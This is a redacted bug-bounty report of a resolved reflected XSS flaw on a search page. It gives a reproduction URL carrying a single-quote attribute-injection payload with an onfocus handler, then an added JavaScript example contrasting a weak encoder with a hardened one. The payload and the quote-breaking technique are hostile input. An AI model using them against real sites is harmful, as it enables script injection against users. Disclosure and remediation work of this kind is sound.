Reflected XSS in [██████]
Medium
Vulnerability Details
**Description:**
Reflected XSS in █████████ due to unsanitized single quote `'`.
## Impact
An attacker could execute arbitrary JavaScript and perform malicious actions!
## Step-by-step Reproduction Instructions
1. Used payload: `simo%27onfocus=%27confirm(document.domain)%27name=%27simo%27#simo`
2. Visit the URL; the alert box should pop up:
`https://www.█████/gri/ziptool/search.aspx?a=1simo%27onfocus=%27confirm(document.domain)%27name=%27simo%27#simo`
█████████
## Suggested Mitigation/Remediation Actions
Sanitize single quotes!
## Impact
An attacker could execute arbitrary JavaScript in the client's browser.
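The suggested mitigation, as an added example (not code from the report or the affected site): an encoder that skips `'` is compared with one that encodes it, using the query value from the reproduction step. It assumes the `a` parameter is written into a single-quoted attribute; the `<input>` markup and all function names are hypothetical.

```javascript
// Added example. ASSUMPTION: the "a" parameter is reflected into a
// single-quoted HTML attribute; markup and function names are hypothetical.

// Weak: encodes & < > " but leaves the single quote untouched.
function encodeWeak(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Hardened: also encodes ' so the value cannot close the attribute.
function encodeAttr(s) {
  return encodeWeak(s).replace(/'/g, "&#39;");
}

// Hypothetical template that reflects the value inside single quotes.
function render(value, encode) {
  return "<input type='text' name='a' value='" + encode(value) + "'>";
}

// List attribute names in one tag, accepting quoted or unquoted values.
// Like a browser, it tolerates a missing space after a closing quote.
function attributeNames(tag) {
  const re = /([^\s"'<>\/=]+)\s*=\s*(?:'[^']*'|"[^"]*"|[^\s"'=<>`]+)/g;
  const names = [];
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True when the rendered tag carries an on* event-handler attribute.
function hasEventHandler(tag) {
  return attributeNames(tag).some((n) => n.startsWith("on"));
}

// Query value from the report's reproduction step, URL-decoded.
const reported = decodeURIComponent(
  "1simo%27onfocus=%27confirm(document.domain)%27name=%27simo%27"
);

console.log(hasEventHandler(render(reported, encodeWeak))); // true
console.log(hasEventHandler(render(reported, encodeAttr))); // false
```

The same check can run as a regression test against any template that places request data inside a quoted attribute.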
Report Stats
- Report ID: 1033253
- State: Closed
- Substate: resolved
- Upvotes: 3